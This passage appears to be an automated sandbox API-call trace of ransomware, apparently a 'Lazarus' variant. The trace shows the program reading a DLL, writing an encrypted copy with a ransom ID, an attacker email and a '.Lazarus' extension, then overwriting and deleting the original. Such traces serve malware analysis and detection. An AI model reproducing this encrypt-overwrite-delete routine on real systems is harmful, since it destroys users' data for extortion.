(lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.512] GetFileType (hFile=0x428) returned 0x1 [0069.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0069.512] CloseHandle (hObject=0x428) returned 1 [0069.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0069.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0069.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0069.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.513] AreFileApisANSI () returned 1 [0069.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0069.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.513] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0069.513] AreFileApisANSI () returned 1 [0069.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.514] GetLastError () returned 0x0 [0069.514] SetLastError (dwErrCode=0x0) [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0069.514] GetLastError () returned 0x0 [0069.514] SetLastError (dwErrCode=0x0) [0069.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x715b8 [0069.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0069.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.514] AreFileApisANSI () returned 1 [0069.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0069.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0069.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0069.514] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.515] GetFileType (hFile=0x428) returned 0x1 [0069.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.515] AreFileApisANSI () returned 1 [0069.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0069.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.516] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.516] GetFileType (hFile=0x410) returned 0x1 [0069.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.516] GetLastError () returned 0x0 [0069.516] SetLastError (dwErrCode=0x0) [0069.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.516] GetLastError () returned 0x0 [0069.516] SetLastError (dwErrCode=0x0) [0069.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.516] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0069.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0069.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0069.518] GetLastError () returned 0x0 [0069.518] SetLastError (dwErrCode=0x0) [0069.519] GetLastError () returned 0x0 [0069.519] SetLastError (dwErrCode=0x0) [0069.519] GetLastError () returned 0x0 [0069.519] SetLastError (dwErrCode=0x0) [0069.519] GetLastError () returned 0x0 [0069.519] SetLastError (dwErrCode=0x0) [0069.519] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.519] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.520] GetLastError () returned 0x0 [0069.520] SetLastError (dwErrCode=0x0) [0069.520] GetLastError () returned 0x0 [0069.520] SetLastError (dwErrCode=0x0) [0069.521] GetLastError () returned 0x0 [0069.521] SetLastError (dwErrCode=0x0) [0069.521] GetLastError () returned 0x0 [0069.521] SetLastError (dwErrCode=0x0) [0069.521] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.521] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.521] GetLastError () returned 0x0 [0069.521] SetLastError (dwErrCode=0x0) [0069.521] GetLastError () returned 0x0 [0069.521] SetLastError (dwErrCode=0x0) [0069.522] GetLastError () returned 0x0 [0069.522] SetLastError (dwErrCode=0x0) [0069.522] GetLastError () returned 0x0 [0069.522] SetLastError (dwErrCode=0x0) [0069.522] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.522] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.522] GetLastError () returned 0x0 [0069.522] SetLastError (dwErrCode=0x0) [0069.522] GetLastError () returned 0x0 [0069.522] SetLastError (dwErrCode=0x0) [0069.522] GetLastError () returned 0x0 [0069.522] SetLastError (dwErrCode=0x0) [0069.523] GetLastError () returned 0x0 [0069.523] SetLastError (dwErrCode=0x0) [0069.523] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x558, lpOverlapped=0x0) returned 1 [0069.523] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.523] GetLastError () returned 0x0 [0069.523] SetLastError (dwErrCode=0x0) [0069.523] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.523] GetLastError () returned 0x0 [0069.523] SetLastError (dwErrCode=0x0) [0069.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0069.523] GetLastError () returned 0x0 [0069.523] SetLastError (dwErrCode=0x0) [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0069.524] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x560, lpOverlapped=0x0) returned 1 [0069.524] GetLastError () returned 0x0 [0069.524] SetLastError (dwErrCode=0x0) [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.524] GetLastError () returned 0x0 [0069.524] SetLastError (dwErrCode=0x0) [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0069.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0069.524] CloseHandle (hObject=0x428) returned 1 [0069.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.526] CloseHandle (hObject=0x410) returned 1 [0069.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0069.526] AreFileApisANSI () returned 1 [0069.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0069.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.526] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.527] GetFileType (hFile=0x410) returned 0x1 [0069.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0069.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.527] GetLastError () returned 0xb7 [0069.527] SetLastError (dwErrCode=0xb7) [0069.527] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.528] CloseHandle (hObject=0x410) returned 1 [0069.529] AreFileApisANSI () returned 1 [0069.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0069.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.529] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.530] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6f7, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧腐\x07̧비聐薸\x08賂̧")) returned 0 [0069.530] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0069.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0069.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.531] AreFileApisANSI () returned 1 [0069.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045", lpUsedDefaultChar=0x0) returned 27 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0069.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 